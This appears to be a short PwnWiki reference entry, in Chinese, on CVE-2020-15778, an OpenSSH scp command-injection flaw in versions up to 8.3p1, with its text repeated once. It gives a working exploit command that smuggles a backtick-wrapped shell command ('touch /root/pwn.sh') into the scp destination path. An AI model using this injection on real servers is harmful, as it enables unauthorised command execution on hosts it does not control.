CVE-2020-15778 Openssh命令注入漏洞
From PwnWiki
影響版本:
Openssh<=8.3p1
利用方法:
scp / hello.txt [email protected]:'`touch /root/pwn.sh`/root'
傳輸hello.txt到/root目錄下,並且執行命令 touch /root/pwn.sh
Openssh<=8.3p1
scp / hello.txt [email protected]:'`touch /root/pwn.sh`/root'
傳輸hello.txt到/root目錄下,並且執行命令 touch /root/pwn.sh